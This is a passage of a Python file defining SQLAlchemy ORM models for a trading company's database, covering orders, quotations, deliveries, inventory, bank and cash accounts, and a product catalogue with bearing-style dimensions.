    record_date = Column(Date, nullable=False)
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class AccountReceive(Base):
    """ORM model for table ``account_receive``."""
    __tablename__ = 'account_receive'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_ticket = Column(Integer, nullable=False, server_default=text("'0'"))
    type_account = Column(Integer, nullable=False, server_default=text("'0'"))
    amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
    record_date = Column(Date, nullable=False)
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Bank(Base):
    """ORM model for table ``bank``."""
    __tablename__ = 'bank'

    id = Column(Integer, primary_key=True)
    bank_name = Column(String(100), nullable=False, server_default=text("''"))
    type_bank = Column(Integer, nullable=False, server_default=text("'0'"))
    initial_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    closing_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BankAccount(Base):
    """ORM model for table ``bank_account``."""
    __tablename__ = 'bank_account'
    __table_args__ = (
        Index('cid', 'cid', 'type_current'),
    )

    id = Column(Integer, primary_key=True)
    bank_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    type_current = Column(Integer, nullable=False, server_default=text("'0'"))
    cid = Column(Integer, nullable=False, server_default=text("'0'"))
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_account = Column(Integer, nullable=False, server_default=text("'0'"))
    amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
    record_date = Column(Date, nullable=False)
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BuyerOrder(Base):
    """ORM model for table ``buyer_order``."""
    __tablename__ = 'buyer_order'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_order = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    delivery_way = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_effect = Column(Integer, nullable=False, server_default=text("'0'"))
    status_completion = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    effect_time = Column(DateTime)
    completion_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BuyerOrderItems(Base):
    """ORM model for table ``buyer_order_items`` (line items of a buyer order)."""
    __tablename__ = 'buyer_order_items'

    id = Column(Integer, primary_key=True)
    buyer_order_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
    custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    delivery_time = Column(String(128), nullable=False, server_default=text("''"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Cash(Base):
    """ORM model for table ``cash``."""
    __tablename__ = 'cash'

    id = Column(Integer, primary_key=True)
    cash_name = Column(String(100), nullable=False, server_default=text("''"))
    initial_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    closing_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CashAccount(Base):
    """ORM model for table ``cash_account``."""
    __tablename__ = 'cash_account'
    __table_args__ = (
        Index('cid', 'cid', 'type_current'),
    )

    id = Column(Integer, primary_key=True)
    cash_id = Column(Integer, nullable=False, server_default=text("'0'"))
    type_current = Column(Integer, nullable=False, server_default=text("'0'"))
    cid = Column(Integer, nullable=False, server_default=text("'0'"))
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_account = Column(Integer, nullable=False, server_default=text("'0'"))
    amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
    record_date = Column(Date, nullable=False)
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Catalogue(Base):
    """ORM model for table ``catalogue``; unique on (brand, model)."""
    __tablename__ = 'catalogue'
    __table_args__ = (
        Index('production_brand', 'production_brand', 'production_model', unique=True),
    )

    id = Column(Integer, primary_key=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, index=True, server_default=text("''"))
    production_label = Column(String(64), nullable=False, server_default=text("''"))
    production_brand_old = Column(String(32), nullable=False, server_default=text("''"))
    production_model_old = Column(String(64), nullable=False, index=True, server_default=text("''"))
    production_class = Column(String(32), nullable=False, server_default=text("''"))
    ind = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    oud = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    wid = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    speed_g = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
    speed_o = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
    weight = Column(Numeric(8, 3), nullable=False, server_default=text("'0.000'"))
    serie = Column(String(32), nullable=False, server_default=text("''"))
    accuracy = Column(String(64), nullable=False, server_default=text("''"))
    preload = Column(String(64), nullable=False, server_default=text("''"))
    seal = Column(String(64), nullable=False, server_default=text("''"))
    angle = Column(String(64), nullable=False, server_default=text("''"))
    r_size = Column(String(64), nullable=False, server_default=text("''"))
    r_matel = Column(String(64), nullable=False, server_default=text("''"))
    assembly_no = Column(String(64), nullable=False, server_default=text("''"))
    assembly_type = Column(String(64), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    tag = Column(String(256), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Category(Base):
    """ORM model for table ``category``."""
    __tablename__ = 'category'

    id = Column(Integer, primary_key=True)
    name = Column(String(100), nullable=False, server_default=text("''"))
    main_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Customer(Base):
    """ORM model for table ``customer``."""
    __tablename__ = 'customer'

    id = Column(Integer, primary_key=True)
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    company_address = Column(String(100), nullable=False, server_default=text("''"))
    company_site = Column(String(100), nullable=False, server_default=text("''"))
    company_tel = Column(String(100), nullable=False, server_default=text("''"))
    company_fax = Column(String(100), nullable=False, server_default=text("''"))
    company_email = Column(String(100), nullable=False, server_default=text("''"))
    company_type = Column(Integer, nullable=False, server_default=text("'0'"))
    owner_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CustomerContact(Base):
    """ORM model for table ``customer_contact``."""
    __tablename__ = 'customer_contact'

    id = Column(Integer, primary_key=True)
    cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    name = Column(String(20), nullable=False, server_default=text("''"))
    salutation = Column(String(20), nullable=False, server_default=text("''"))
    mobile = Column(String(20), nullable=False, server_default=text("''"))
    tel = Column(String(20), nullable=False, server_default=text("''"))
    fax = Column(String(20), nullable=False, server_default=text("''"))
    email = Column(String(60), nullable=False, server_default=text("''"))
    department = Column(String(20), nullable=False, server_default=text("''"))
    address = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    status_default = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CustomerInvoice(Base):
    """ORM model for table ``customer_invoice``; keyed by customer id (cid)."""
    __tablename__ = 'customer_invoice'

    cid = Column(Integer, primary_key=True)
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    company_tax_id = Column(String(20), nullable=False, server_default=text("''"))
    company_address = Column(String(100), nullable=False, server_default=text("''"))
    company_tel = Column(String(100), nullable=False, server_default=text("''"))
    company_bank_name = Column(String(100), nullable=False, server_default=text("''"))
    company_bank_account = Column(String(100), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Delivery(Base):
    """ORM model for table ``delivery``."""
    __tablename__ = 'delivery'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    sales_order_id = Column(Integer, index=True, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    type_delivery = Column(Integer, nullable=False, server_default=text("'0'"))
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_delivery = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    warehouse_id = Column(Integer, nullable=False)
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_confirm = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    confirm_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class DeliveryItems(Base):
    """ORM model for table ``delivery_items`` (line items of a delivery)."""
    __tablename__ = 'delivery_items'

    id = Column(Integer, primary_key=True)
    delivery_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    sales_order_id = Column(Integer, index=True, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
    custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_id = Column(Integer, nullable=False, index=True)
    # NOTE(review): brand/model are String(16)/String(32) here, shorter than
    # the String(32)/String(64) used by most other tables — presumably this
    # mirrors the existing schema; verify before unifying.
    production_brand = Column(String(16), nullable=False, server_default=text("''"))
    production_model = Column(String(32), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    warehouse_id = Column(Integer, nullable=False)
    rack_id = Column(Integer, nullable=False)
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Enquiry(Base):
    """ORM model for table ``enquiry``."""
    __tablename__ = 'enquiry'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_enquiry = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    delivery_way = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_order = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    expiry_date = Column(Date, nullable=False)
    audit_time = Column(DateTime)
    order_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class EnquiryItems(Base):
    """ORM model for table ``enquiry_items`` (line items of an enquiry)."""
    __tablename__ = 'enquiry_items'

    id = Column(Integer, primary_key=True)
    enquiry_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True)
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    enquiry_production_model = Column(String(64), nullable=False, server_default=text("''"))
    enquiry_quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    delivery_time = Column(String(128), nullable=False, server_default=text("''"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    status_ordered = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Futures(Base):
    """ORM model for table ``futures``."""
    __tablename__ = 'futures'
    __table_args__ = (
        Index('production_model', 'production_model', 'production_brand'),
    )

    id = Column(Integer, primary_key=True)
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    production_brand = Column(String(16), nullable=False, server_default=text("''"))
    production_model = Column(String(32), nullable=False, server_default=text("''"))
    currency = Column(String(3), nullable=False, server_default=text("'CNY'"))
    # NOTE(review): '0000-00-00' zero-date defaults require a permissive
    # MySQL sql_mode (no NO_ZERO_DATE) — confirm against the target server.
    req_date = Column(Date, nullable=False, server_default=text("'0000-00-00'"))
    acc_date = Column(Date, nullable=False, server_default=text("'0000-00-00'"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    sub_total = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Inventory(Base):
    """ORM model for table ``inventory``."""
    __tablename__ = 'inventory'

    id = Column(Integer, primary_key=True)
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    warehouse_id = Column(Integer, nullable=False)
    warehouse_name = Column(String(100), nullable=False, server_default=text("''"))
    rack_id = Column(Integer, nullable=False)
    rack_name = Column(String(16), nullable=False, server_default=text("''"))
    stock_qty_initial = Column(Integer, nullable=False, server_default=text("'0'"))
    stock_qty_current = Column(Integer, nullable=False, server_default=text("'0'"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Production(Base):
    """ORM model for table ``production``; unique on (brand, model)."""
    __tablename__ = 'production'
    __table_args__ = (
        Index('production_brand', 'production_brand', 'production_model', unique=True),
    )

    id = Column(Integer, primary_key=True)
    category_id = Column(Integer, nullable=False, server_default=text("'0'"))
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, index=True, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    production_class = Column(String(32), nullable=False, server_default=text("''"))
    ind = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    oud = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    wid = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
    speed_g = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
    speed_o = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
    weight = Column(Numeric(8, 3), nullable=False, server_default=text("'0.000'"))
    serie = Column(String(32), nullable=False, server_default=text("''"))
    accuracy = Column(String(64), nullable=False, server_default=text("''"))
    preload = Column(String(64), nullable=False, server_default=text("''"))
    seal = Column(String(64), nullable=False, server_default=text("''"))
    angle = Column(String(64), nullable=False, server_default=text("''"))
    r_size = Column(String(64), nullable=False, server_default=text("''"))
    r_matel = Column(String(64), nullable=False, server_default=text("''"))
    assembly_no = Column(String(64), nullable=False, server_default=text("''"))
    assembly_type = Column(String(64), nullable=False, server_default=text("''"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    cost_ref = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    cost_new = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    cost_avg = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    tag = Column(String(256), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class ProductionSensitive(Base):
    """ORM model for table ``production_sensitive``; unique on (customer_cid, production_id)."""
    __tablename__ = 'production_sensitive'
    __table_args__ = (
        Index('customer_cid_2', 'customer_cid', 'production_id', unique=True),
    )

    id = Column(Integer, primary_key=True)
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Purchase(Base):
    """Purchase order header (table ``purchase``).

    Holds supplier references, order amounts, and the audit/confirm/delete
    workflow flags with their timestamps; line items live in
    ``purchase_items``.
    """

    __tablename__ = 'purchase'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Optional link to the originating buyer order (nullable, defaults to 0).
    buyer_order_id = Column(Integer, index=True, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Denormalized supplier name, duplicated here from the supplier record.
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    type_purchase = Column(Integer, nullable=False, server_default=text("'0'"))
    # Monetary breakdown: production + shipping + adjustment -> purchase total.
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_purchase = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    warehouse_id = Column(Integer, nullable=False)
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    # Workflow state: audit, confirm, soft delete — each flag has a timestamp.
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_confirm = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    confirm_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class PurchaseItems(Base):
    """Purchase order line item (table ``purchase_items``).

    One row per product on a purchase order (``purchase_id``), carrying
    quantity, unit price, and denormalized supplier/product descriptors.
    """

    __tablename__ = 'purchase_items'

    id = Column(Integer, primary_key=True)
    purchase_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    buyer_order_id = Column(Integer, index=True, server_default=text("'0'"))
    supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Denormalized supplier/product descriptors copied at order time.
    supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(16), nullable=False, server_default=text("''"))
    production_model = Column(String(32), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    # Storage location for the received goods.
    warehouse_id = Column(Integer, nullable=False)
    rack_id = Column(Integer, nullable=False)
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Quotation(Base):
    """Customer quotation header (table ``quotation``).

    Holds customer references, quoted amounts, an expiry date, and the
    audit/order/delete workflow flags with their timestamps; line items
    live in ``quotation_items``.
    """

    __tablename__ = 'quotation'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    # Monetary breakdown: production + shipping + adjustment -> quotation total.
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_quotation = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    delivery_way = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    # Workflow state: audit, converted-to-order, soft delete.
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_order = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    # Date after which the quotation is no longer valid.
    expiry_date = Column(Date, nullable=False)
    audit_time = Column(DateTime)
    order_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class QuotationItems(Base):
    """Quotation line item (table ``quotation_items``).

    One row per quoted product on a quotation (``quotation_id``), keeping
    both the customer's original enquiry fields and the matched catalog
    product, plus quantity, unit price, and delivery terms.
    """

    __tablename__ = 'quotation_items'

    id = Column(Integer, primary_key=True)
    quotation_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True)
